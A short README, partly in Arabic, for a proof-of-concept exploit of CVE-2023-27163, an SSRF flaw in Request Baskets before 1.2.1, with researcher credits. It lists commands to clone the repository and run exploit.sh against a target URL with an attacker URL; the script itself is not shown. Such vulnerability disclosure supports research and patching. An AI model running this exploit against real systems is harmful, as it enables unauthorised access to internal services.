
CVE-2023-27163 - Request Baskets SSRF
Request Baskets SSRF PoC
alt text
إصدارات Request Baskets الأقدم من 1.2.1 معرضة لهجمات التزوير من جانب الخادم (SSRF) عبر مكوّن /api/baskets/{name}.
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
يعود الفضل إلى @beet1e من جامعة شنغهاي جياو تونغ، و@chenlibo147، و@houqinsheng، و[email protected] من جامعة شاندونغ. المقال: https://notes.sjtu.edu.cn/s/MUUhEymt7#